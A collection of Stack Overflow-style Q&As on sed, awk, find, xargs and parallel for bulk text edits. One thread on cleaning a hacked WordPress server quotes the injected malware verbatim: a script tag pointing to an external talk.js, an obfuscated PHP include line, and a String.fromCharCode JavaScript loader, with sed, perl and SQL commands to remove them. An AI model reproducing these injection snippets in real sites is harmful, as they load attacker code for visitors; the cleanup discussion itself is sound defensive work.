gnu parallel + sed to edit both csv header and contents - bash

I'm trying to use command line tools to edit some CSV I have in the following format for several year folders:
dataset
year_1 (i.e. 1929)
csv_filename_1.csv
csv_filename_2.csv
csv_filename_3.csv
...
year_2
...
I'm trying to append the file name to its content, creating a new column called filename with ./year_1/csv_filename_1.csv to all columns in it. After that, I would gzip it.
Due to the number of year folders (almost 100) and the CSVs quantities in each (totaling 100k+), I plan to use gnu parallel to run it, and
I was trying to use sed doing something like
fname="1929/csv_filename_1.csv" && \ # to simulate parallel's parameterization
sed -E -e '1s/$/,filename/' \ # append ",filename" to CSV header
-e '2,\$s/$/,${fname}/' ${fname} \ # append the filename string to the content
But I can't get the sed to work with the second expression because I either get "${fname}" written as-is to the file, or the sed error "sed: -e expression #1, char 6: unknown command: '\'" complaining about a comma or the slash. I also have tried to group the expressions like -e '1{s/$/,filename/};2,\${s/$/,${fname}/}' for no avail.
Currently, I gave up sed and started trying with awk, but not knowing why it didn't work is bothering me, so I came to ask why and how to make it work.
Just one more piece of info regarding how I intend to run this thing. It would be something like
find ~/dataset -iname "*csv" -print0 | parallel -0 -j0 '<the whole command here (sed + gz)>'
How could I do this? What am I forgetting? Thanks, folks!
PS: I just got it with awk
awk -v d="csv_filename_1.csv" -F"," 'FNR==1{a="filename"} FNR>1{a=d} {print $0","a}' csv_filename_1.csv | less

This might work for you (GNU parallel and sed):
find . -type f -name '*.csv' | parallel sed -i \''1s/$/,filename/;1!s#$#,{}#'\' {}
Use find to deliver the filename to the parallel command.
Use sed to append ,filename to the heading of each file and the file name present in {} to each line in the file.
N.B. The use of alternative delimiters s#...#...# in the second sed command to allow for the filename slashes. Also the find should be executed in the dataset directory.

Related

Sed & Mac OS Terminal: How to remove parentheses content from the first line of every file?

I am on Mac Os 10.14.6 and have a directory that contains subdirectories that all contain text files. Altogether, there are many hundreds of text files.
I would like to go through the text files and check for any content in the first line that is in parentheses. If such content is found, then the parentheses (and content in the parentheses) should be removed.
Example:
Before removal:
The new world (82 edition)
After removal:
The new world
How would I do this?
Steps I have tried:
Google around, it seems SED would be best for this.
I have found this thread, which provides SED code for removing bracketed content.
sed -e 's/([^()]*)//g'
However, I am not sure how to adapt it to work on multiple files and also to limit it to the first line of those files. I found this thread which explains how to use SED on multiple files, but I am not sure how to adapt the example to work with parentheses content.
Please note: As long as the solution works on Mac OS terminal, then it does not need to use SED. However, from Googling, SED seems to be the most suited.
I managed to achieve what you're after simply by using a bash script and sed together, as so:
#!/bin/bash
for filename in $PWD/*.txt; do
sed -i '' '1 s/([^()]*)//g' $filename
done
The script simply iterates over all the .txt files in $PWD (the current working directory, so that you can add this script to your bin and run it anywhere), and then runs the command
sed -ie '1 s/([^()]*)//g' $filename
on the file. By starting the command with the number 1 we tell sed to only work on the first line of the file :)
Edit: Best Answer
The above works fine in a directory where all contained objects are files, and not including directories; in other words, the above does not perform recursive search through directories.
Therefore, after some research, this command should perform exactly what the question asks:
find . -name "*.txt" -exec sed -i '' '1 s/([^()]*)//g' {} \;
I must iterate, and reiterate, that you test this on a backup first to test it works. Otherwise, use the same command as above but change the '' in order to control the creation of backups. For example,
find . -name "*.txt" -exec sed -i '.bkp' '1 s/([^()]*)//g' {} \;
This command will perform the sed replace in the original file (keeping the filename) but will create a backup file for each with the appended .bkp, for example test1.txt becomes test1.txt.bkp. This a safer option, but choose what works best for you :)
Good try,
The command you where looking for single line:
sed -E '1s|\([^\)]+\)||'
The command to replace each input file first line:
sed -Ei '1s|\([^\)]+\)||' *.txt
example:
echo "The new world (82 edition)" |sed -E '1s|\([^\)]+\)||'
The new world
Explanation
sed -Ei E option: the extended RegExp syntax, i option: for in-place file replacement
sed -Ei '1s|match RegExp||' for first line only, replace first matched RegExp string with empty string
\([^\)]+\) RegExp matching: start with (, [^\)]any char not ), + - more than once, terminate with )
Try:
# create a temporary file
tmp=$(mktemp)
# for each something in _the current directory_
for i in *; do
# if it is not a file, don't parse it
if [ ! -f "$i" ]; then continue; fi
# remove parenthesis on first line, save the output in temporary file
sed '1s/([^)]*)//g' "$i" > "$tmp"
# move temporary file to the original file
mv "$tmp" "$i"
done
# remove temporary file
rm "$tmp"

How to replace whole string using sed or possibly grep

So my whole server got hacked or got the malware problem. my site is based on WordPress and the majority of sites hosted on my server is WordPress based. The hacker added this line of code to every single file and in database
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string on a single file index.php first, so I know it works.
and I know my code is wrong. Please help me with this.
I tried with the #Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
Though #slybloty's solution is easy and it worked.
so to remove the code fully from all the affected files. I'm running the following 3 commands, Thanks to all of you for this.
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the #include line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.
now, I still need to figure out the junk files and traces of it.
The hacker script added the JS code as well.
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - find
-type f - only files
-name '*.txt' - that end with php
-print0 - pritn them separated by zero bytes
| xargs -0 - for each file separated by zero byte
-P7 - run 7 processes concurently
-n1 - for each one file
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run from other answers.
You may want to add -t option to xargs to see the progress. See man find (man args](http://man7.org/linux/man-pages/man1/xargs.1.html).
Single quotes are taken literally without escape characters.
In var='hello\'', you have an un-closed quote.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed can use any delimiter to separate commands. Since you have slashes in the commands, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This idea is unique to bash.
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
Edit: Please see #EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. GNU version of sed should have this. I'm also making the assumption that this code always appears in the format being 6 lines long
while read -r filename; do
# .bak optional here if you want to back any files that are edited
sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g'
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything until a line feed, and then matches the line feed, avoiding greedy regex matching. Because we aren't splitting on line feeds (-z), the regex var pl = String\.fromCharCode(104,116,116,112,115' .).*\n}\n matches the largest possible match. For example, if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Thus, repeating this sequence 6 times matches us to the end of the first line as well as the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that have the matching pattern. This way, sed isn't editing every file. Without this, -i.bak (not plain -i) would make a mess.
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today, all page posts got this nasty virus script added
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I dissabled it from database by
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
I do not have files infected at least
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not found a thing, but I have no idea how this got into database from which am not calm at all.
This infection caused redirects on pages, chrome mostly detect and block this. Did not notice anything strange in - /wp-mail-smtp/src/Debug.php
For me worked this:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search for : *.js, *.json, *.map
I've got the same thing today, all page posts got the script added.
I've handled with them successfully by using the Search and replace plugin.
Moreover, I've also found one record in wp_posts table post_content column
folowing string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

XARGS: Nesting Utilities within Utility call

I am trying to build a YAML file for a large database by piping in a list of names to printf with xargs.
I would like to call ls in the printf command to get files specific for each name in my list, however calls to ls nested within a printf command doesn't seem to work..
The following command
cat w1.nextract.list | awk '{print $1}' | xargs -I {} printf "'{}':\n\tw1:\n\t\tanatomical_scan:\n\t\t\tAnat: $(ls $(pwd)/{})\n"
Just provides the following error
ls: cannot access '/data/raw/long/{}': No such file or directory
Followed by an output that looks like:
'149959':
w1:
anatomical_scan:
Anat:
I'd like to be able to use the standard input to xargs to be used within the nested utility command to give me an autocompleting path to the necessary files.. i.e.)
'149959':
w1:
anatomical_scan:
Anat: /data/raw/long/149959/test-1/test9393.txt
Anyone have any ideas?
Anyone have any ideas?
A safer way that has several caveats would be:
% cat w1.nextract.list | \
sed -e 's#^\(^[^/]*\)/\(.*\)$#'\''\1'\'':\n w1:\nANA-SCAN\nANAT-PWD\1/\2#' \
-e "s#ANAT-PWD# Anat: `pwd`/#" \
-e 's/ANA-SCAN/ anatomical_scan:/'
There are restrictions on the contents of the w1.nextract.list file:
None of the lines may contain a hash ('#') character.
Any other special characters on a line may be unsafe.
For testing, I created the w1.nextract.list file with one entry:
149959/test-1/test9393.txt
The resulting output is here:
'149959':
w1:
anatomical_scan:
Anat: /data/raw/long/149959/test-1/test9393.txt
Can you explain in more detail? What makes this so fragile?
Using xargs to printf results can lead to unexpected results if the input file has special characters or escape sequences. A bad actor could then modify your input file to exploit this issue. Best practice is to avoid.
Fragility comes from maintaining the w1.nextract.list file. You could auto generate the file to reduce this issue:
cd /data/raw/long/; find * -type f -print
What is a real YAML implementation?
The yq command is an example YAML implementation. You could use it to craft the .yaml file.
I haven't worked with these type of python packages before so it's a first time approach solution.
Using python, perl, or even php would allow you to craft the file without worrying about unsafe characters in the filenames.

Unix scripting in bash to search logs and return a specific part of a specific log file

Dare I say it, I am mainly a Windows person (please don't shoot me down too soon), although I have played around in Linux in the past (mostly command line).
I have a process I have to go through once in a while which is in essence searching all log files in a directory (and sub directories) for a certain filename and then getting something out of said log file.
My first step is
grep -Ril <filename or Partial filename you are looking for> log/*.log
From that I have the log filename and I vi that to find where it occurs.
To clarify: that grep is looking through all log files seeing if the filename after the -Ril occurs within them.
vi log/<log filename>
/<filename or Partial filename you are looking for>
I do j a couple of times to find CDATA, and then I have a URL I need to extract, then in putty do a select, copy and paste it into a browser.
Then I quit vi without saving.
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.2
Fred.2
start grep
end grep
Renamed to Fred.2.20150831140931
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l1703775&sp=l1703775</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.2.20150831140931&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
----------------------------------------------------------------------------------------
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.3
Fred.3
start grep
end grep
Renamed to Fred.3.20150999999999
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l999999&sp=l9999999</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.3.20150999999999&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
What I want to grab is the URL in CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999] for Fred.3.20150999999999 indicated by the line Renamed to Fred.3.20150999999999.
Is this possible? (And I do apologise by the XML formatting, but it is exactly as it is in the log file.)
Thanks in advance,
Tel
sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p' <logfile>
-n suppress automatic printing of pattern space
# - as sed pattern delimiter
( ) - grouping the patterns
\2 - second pattern
p - print
**Update - grep file pattern **
grep -Ril <filename or Partial filename you are looking for> log/*.log | xargs sed -n "/<pattern>/,/filePath=/p" | sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p'
xargs takes output of previous command as input file.
If pattern is Fred.3.20150999999999, first sed will print from matched pattern to filePath= and next sed will extract CDATA in it.
While your grep command may be used to locate the file, the find command is quite a bit more flexible and a bit more appropriate. The basic use to locate your log file would be similar to:
find /path/to/logdir -type f -name "partial*.log"
Which will recursively search under /path/to/logdir for a file -type f whose name matches the pattern "partial*.log".
Isolating the url can be similar to the other answer, but here using multiple expressions, you can isolate the url with:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' <logfilename> \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Output:
https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775
Where the first expression isolates the url itself from within your <logfilename>, the second expression suppresses any blank lines and finally, the third, which removes an fragments returned beginning with a [space, tab or newline].
If you can tune your find command to reliably return the exact file you need to retrieve the url from, then you can write your find and sed command together as:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' \
$(find /path/to/logdir -type f -name "partial*.log") \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Where you have simply used command substitution to replace <logfilename> with the find command enclosed in $(...).
Note there are many different ways to write the sed substitution, some probably more elegant that this one, but that is where the power lies in sed. Give this a try and let me know if you run into problems. I hope this helps.

How to extract a string at end of line after a specific word

I have different location, but they all have a pattern:
some_text/some_text/some_text/log/some_text.text
All locations don't start with the same thing, and they don't have the same number of subdirectories, but I am interested in what comes after log/ only. I would like to extract the .text
edited question:
I have a lot of location:
/s/h/r/t/log/b.p
/t/j/u/f/e/log/k.h
/f/j/a/w/g/h/log/m.l
Just to show you that I don't know what they are, the user enters these location, so I have no idea what the user enters. The only I know is that it always contains log/ followed by the name of the file.
I would like to extract the type of the file, whatever string comes after the dot
THe only i know is that it always contains log/ followed by the name
of the file.
I would like to extract the type of the file, whatever string comes
after the dot
based on this requirement, this line works:
grep -o '[^.]*$' file
for your example, it outputs:
text
You can use bash built-in string operations. The example below will extract everything after the last dot from the input string.
$ var="some_text/some_text/some_text/log/some_text.text"
$ echo "${var##*.}"
text
Alternatively, use sed:
$ sed 's/.*\.//' <<< "$var"
text
Not the cleanest way, but this will work
sed -e "s/.*log\///" | sed -e "s/\..*//"
This is the sed patterns for it anyway, not sure if you have that string in a variable, or if you're reading from a file etc.
You could also grab that text and store in a sed register for later substitution etc. All depends on exactly what you are trying to do.
Using awk
awk -F'.' '{print $NF}' file
Using sed
sed 's/.*\.//' file
Running from the root of this structure:
/s/h/r/t/log/b.p
/t/j/u/f/e/log/k.h
/f/j/a/w/g/h/log/m.l
This seems to work, you can skip the echo command if you really just want the file types with no record of where they came from.
$ for DIR in *; do
> echo -n "$DIR "
> find $DIR -path "*/log/*" -exec basename {} \; | sed 's/.*\.//'
> done
f l
s p
t h

Resources